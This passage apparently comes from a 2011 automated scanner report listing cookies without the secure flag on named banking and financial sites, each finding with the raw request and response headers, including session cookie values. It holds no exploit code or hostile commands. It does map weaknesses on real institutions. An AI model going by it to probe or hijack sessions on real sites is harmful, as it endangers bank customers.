<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Welcome to PNC - PNC Home Equity Loan Rates Search</title>
...[SNIP]...

6.71. https://www.retirementgold.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.retirementgold.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.retirementgold.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 156
Content-Type: text/html
Location: https://www.retirementgold.com/fnbo
Set-Cookie: ASPSESSIONIDAAQSTCQQ=GLLJBHGAIDPLDGIHHBMDKOAH; path=/
Date: Wed, 02 Feb 2011 22:20:27 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.retirementgold.com/fnbo">here</a>.</body>

6.72. https://www.smart-hsa.com/pnc/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.smart-hsa.com
Path:   /pnc/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pnc/ HTTP/1.1
Host: www.smart-hsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: No-Cache
Content-Length: 14470
Content-Type: text/html
Expires: Wed, 02 Feb 2011 22:31:58 GMT
X-Powered-By: ASP.NET
Set-Cookie: SurpasCC=OK; path=/
Set-Cookie: SuRPAS=OK; path=/; secure
Set-Cookie: HSA%5Femployer=; path=/
Set-Cookie: HSA%5FBranch=PN001; path=/
Set-Cookie: HSA%5FClient=PNC; path=/
Set-Cookie: ASPSESSIONIDCAQRACCA=OBAAPFJAMNGHJIIEDCPIAEBF; path=/
Date: Wed, 02 Feb 2011 22:32:58 GMT
Set-Cookie: NSC_q*jgtit-w0-mc*443=ffffffff0965988e45525d5f4f58455e445a4a42378b;path=/;secure;httponly
Set-Cookie: NSC_q*jgtit-w0-htmc*443=ffffffffa9c1665345525d5f4f58455e445a4a420000;path=/;secure;httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

6.73. https://www.smart-hsa.com/pnc/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.smart-hsa.com
Path:   /pnc/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pnc/ HTTP/1.1
Host: www.smart-hsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: No-Cache
Content-Length: 14470
Content-Type: text/html
Expires: Wed, 02 Feb 2011 22:19:27 GMT
X-Powered-By: ASP.NET
Set-Cookie: SurpasCC=OK; path=/
Set-Cookie: SuRPAS=OK; path=/; secure
Set-Cookie: HSA%5Femployer=; path=/
Set-Cookie: HSA%5FBranch=PN001; path=/
Set-Cookie: HSA%5FClient=PNC; path=/
Set-Cookie: ASPSESSIONIDSCRTBCBA=JONBFMJAMEDBECIICFFLHGBN; path=/
Date: Wed, 02 Feb 2011 22:20:27 GMT
Set-Cookie: NSC_q*jgtit-w0-mc*443=ffffffff09653c8e45525d5f4f58455e445a4a42378b;path=/;secure;httponly
Set-Cookie: NSC_q*jgtit-w0-htmc*443=ffffffffa9c1225345525d5f4f58455e445a4a420000;path=/;secure;httponly

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

6.74. https://www4.usbank.com/internetBanking/RequestRouter  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/RequestRouter

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/RequestRouter HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 7828
Set-Cookie: JSESSIONIDRIB09=0000FrNgyz_FdPFwsTt_iMc_-lN:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>
<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">
</head>
<body>
<MAP NAME="TopNav">
<AREA SHAPE=
...[SNIP]...

6.75. https://www4.usbank.com/internetBanking/RequestRouter  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/RequestRouter

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/RequestRouter?requestCmdId=DisplayLoginPage HTTP/1.1
Host: www4.usbank.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:00:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Set-Cookie: JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; Path=/internetBanking
Set-Cookie: CAMPID=""; Expires=Sat, 02 Feb 2041 04:23:43 GMT; Path=/; Domain=.usbank.com
Server: WebSphere Application Server/6.1


<noscript>
<HTML>
<HEAD>
<meta http-equiv="Refresh" content="0; URL=https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp#enablingjavascript">

<META NAME="keywords" C
...[SNIP]...

6.76. https://www4.usbank.com/internetBanking/RequestRouter  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/RequestRouter

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/RequestRouter HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 7829
Set-Cookie: JSESSIONIDRIB011=0000QfeDKqBzExihl0t6Sl1rbNV:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>
<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">
</head>
<body>
<MAP NAME="TopNav">
<AREA SHAPE=
...[SNIP]...

6.77. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/BrowserRequirementsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14681
Set-Cookie: JSESSIONIDRIB09=0000K4E52Qoy6PbGS6Z06RA5tSI:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/internetBan
...[SNIP]...

6.78. https://www4.usbank.com/internetBanking/en_us/info/BrowserRequirementsOut.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/BrowserRequirementsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/BrowserRequirementsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14682
Set-Cookie: JSESSIONIDRIB011=0000ggpvqAphewOgNOFlO8lrK0H:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1

<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/internetBan
...[SNIP]...

6.79. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/ContactUsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 23:45:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14538
Set-Cookie: JSESSIONIDRIB011=0000AgcxpIllPHFlV7I1C0_htWM:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1


<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/inter
...[SNIP]...

6.80. https://www4.usbank.com/internetBanking/en_us/info/ContactUsOut.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www4.usbank.com
Path:   /internetBanking/en_us/info/ContactUsOut.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internetBanking/en_us/info/ContactUsOut.jsp HTTP/1.1
Host: www4.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391; JSESSIONIDRIB07=0000Z-XYgl3TaZe4ANzuha1_G7j:-1; CAMPID="";

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html;charset=ISO-8859-1
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Language: en-US
Content-Length: 14537
Set-Cookie: JSESSIONIDRIB09=0000ow2BUtOGja-8V-F7CZsYAu6:-1; Path=/internetBanking
Server: WebSphere Application Server/6.1


<html>

<head>

<title>U.S. Bank Internet Banking</title>

<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src="/inter
...[SNIP]...

6.81. https://www6.bankofamerica.com/planning/investments.action  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www6.bankofamerica.com
Path:   /planning/investments.action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /planning/investments.action HTTP/1.1
Host: www6.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:15 GMT
Content-type: text/html
Set-Cookie: TLTSID=01EAE3C62F1C102FF420FC65CDE09FEF; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=01EAE3C62F1C102FF420FC65CDE09FEF; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:30:15 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-control: no-cache, post-check=0, pre-check=0
Content-language: en-US
Set-cookie: JSESSIONID=0000r3FrrbR9U4oqGFNN1W9Hqpz:12qb4k2ev; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...

6.82. https://chaseonline.chase.com/auth/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /auth/login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/login.aspx HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4559
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=8A02CA39CD9313C4; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:00 GMT
Connection: close


<html>
   <head>
       <title>Login Frame</title>
       <script language="javascript">var jsVer = "";</script>
       <script language="javascript1.1" type="text/javascript">jsVer = "1.1";</script>
       <scrip
...[SNIP]...

6.83. https://chaseonline.chase.com/chaseonline/reidentify/sso_reidentify.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /chaseonline/reidentify/sso_reidentify.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /chaseonline/reidentify/sso_reidentify.jsp HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 167
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /Public/Reidentify/ReidentifyFilterView.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=CA1D7D273B8AF772; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:01:53 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fPublic%2fReidentify%2fReidentifyFilterView.aspx">here</a>.</h2>
</body></html>

6.84. https://chaseonline.chase.com/js/Reporting.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://chaseonline.chase.com
Path:   /js/Reporting.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Reporting.js HTTP/1.1
Host: chaseonline.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 70473
Content-Type: application/x-javascript
Content-Location: https://chaseonline.chase.com/js/Reporting.js
Last-Modified: Mon, 06 Dec 2010 18:24:12 GMT
Accept-Ranges: bytes
ETag: "02ebcc77295cb1:51e6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=6C9A73F2B86FE9ED; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:01:52 GMT
Connection: close


var CHASE=CHASE||{};CHASE.analytics=(function(){var analyticsConfig=new(function Config(){this.Enabled=true;this.PageDotPathSet=false;this.Initialized=false;this.DelayTag=false;this.DebugMode=true;th
...[SNIP]...

6.85. https://myaccounts.navyfcu.org/cgi-bin/ifsewwwc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://myaccounts.navyfcu.org
Path:   /cgi-bin/ifsewwwc

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/ifsewwwc?Logon HTTP/1.1
Host: myaccounts.navyfcu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:06 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpool-MYACCOUNTS-IFSE_1443=1091045898.41733.0000; path=/
Content-Length: 15013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Template filename: LogonForm.html 65 -->
<html xmlns="http://www.w3.org/1
...[SNIP]...

6.86. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signon HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:02:13 GMT
Cache-Control: no-cache="set-cookie"
X-Cnection: close
Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com;
Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com;
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://online.wellsfargo.com/logi
...[SNIP]...

6.87. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/AuthService HTTP/1.1
Host: onlineservices.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:13 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure
x-frames-option: deny
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 13099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

6.88. https://resources.cardmemberservices.com/MyAccounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://resources.cardmemberservices.com
Path:   /MyAccounts.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyAccounts.aspx HTTP/1.1
Host: resources.cardmemberservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 170
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://online.cardmemberservices.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2>
</body></html>

6.89. https://resources.chase.com/MyAccounts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://resources.chase.com
Path:   /MyAccounts.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MyAccounts.aspx HTTP/1.1
Host: resources.chase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 162
Content-Type: text/html; charset=utf-8
Expires: -1
Location: https://chaseonline.chase.com/MyAccounts.aspx
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache=Set-Cookie
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
Date: Wed, 02 Feb 2011 22:02:19 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2>
</body></html>

6.90. https://s.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://s.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: s.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:22 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=AD-00000000147665198; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:22 GMT
Location: https://s.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


6.91. https://stg.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://stg.xp1.ru4.com
Path:   /meta

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meta HTTP/1.1
Host: stg.xp1.ru4.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 02 Feb 2011 22:02:37 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: X1ID=ZA-00000000023314508; domain=.ru4.com; path=/; expires=Wed, 02-Aug-2012 17:02:37 GMT
Location: https://stg.xp1.ru4.com/images/pixel.gif
Content-length: 0
Connection: close


6.92. https://tc.bankofamerica.com/c  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /c

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c?siteid=429&ccID=BOA_HOME_SIGNON_SERVICE_01&ccID=BOA_HOME_SIGNON_SERVICE_02&ccID=BOA_HOME_SIGNON_SERVICE_03&ccID=BOA_HOME_SIGNON_HERO&location=https%3A%2F%2Fwww.bankofamerica.com%2Fhomepage%2Foverview.go%3FBOA_0020%3D999%26tc_lang%3Den_US%26state%3Dnull%26BA_0021%3Dnull%26BOA_HPR%3Dnull HTTP/1.1
Host: tc.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Date: Wed, 02 Feb 2011 22:02:37 GMT
